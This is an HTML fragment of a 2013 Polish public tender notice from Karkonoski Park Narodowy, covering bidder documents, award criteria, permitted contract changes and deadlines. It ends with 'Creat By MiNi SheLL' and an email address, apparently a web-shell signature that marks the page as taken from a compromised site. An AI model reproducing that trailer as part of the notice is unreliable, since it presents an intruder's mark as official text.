<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>I. Zmiana terminu realizacji przedmiotu umowy I.1. zmiany spowodowane warunkami atmosferycznymi, geologicznymi, archeologicznymi, w szczególności: a) klęski żywiołowe; b) warunki atmosferyczne uniemożliwiające prowadzenie robót budowlanych, przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów, w szczególności: temperatury powietrza poniżej 00C, wiatr uniemożliwiający pracę maszyn budowlanych, gwałtowne opady deszczu (oberwanie chmury), gradobicie, burze z wyładowaniami atmosferycznymi c) odmienne od przyjętych w dokumentacji projektowej warunki geologiczne (kategorie gruntu, kurzawka, głazy narzutowe itp.); d) odmienne od przyjętych w dokumentacji projektowej warunki terenowe, w szczególności istnienie podziemnych sieci, instalacji, urządzeń lub nie zinwentaryzowanych obiektów budowlanych (bunkry, fundamenty, ściany szczelne itp.) I.2 zmiany będące następstwem działania organów administracji, w szczególności: a) przekroczenie nakreślonych przez prawo terminów wydawania przez organy administracji decyzji, zezwoleń, uzgodnień itp.; b) odmowa wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień na skutek błędów w dokumentacji projektowej I.3 Zamawiający dopuszcza możliwość przedłużenia terminu realizacji umowy, mimo iż opóźnienie w jej wykonaniu będzie następstwem okoliczności, za które odpowiada Wykonawca, jeżeli: a) Wykonawca powiadomi Zamawiającego najpóźniej na 30 przed upływem terminu wykonania umowy, o niemożliwości ukończenia jej wykonywania w tym terminie; b) Wykonawca zaproponuje nowy termin zakończenia wykonywania umowy; W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt I.1 - I.2 termin wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności. II.2 Zmiany osobowe a) zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej równoważnymi uprawnieniami, o których mowa w ustawie Prawo budowlane; b) zmiana podwykonawcy, przy pomocy którego Wykonawca wykonuje przedmiot umowy na innego dysponującego co najmniej porównywalnym doświadczeniem, potencjałem technicznym i osobowym; III. Pozostałe zmiany a) siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ; b) zmiana obowiązującej stawki VAT; Jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku zapłaconego przez wykonawcę. c) zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu; d) rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim przypadku wynagrodzenie przysługujące wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.kpnmab.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Karkonoski Park Narodowy z siedzibą w Jeleniej Górze
ul. Chałubińskiego 23
58-570 Jelenia Góra.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.02.2013 godzina 13:00, miejsce: Karkonoski Park Narodowy z siedzibą w Jeleniej Górze
ul. Chałubińskiego 23
58-570 Jelenia Góra 
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com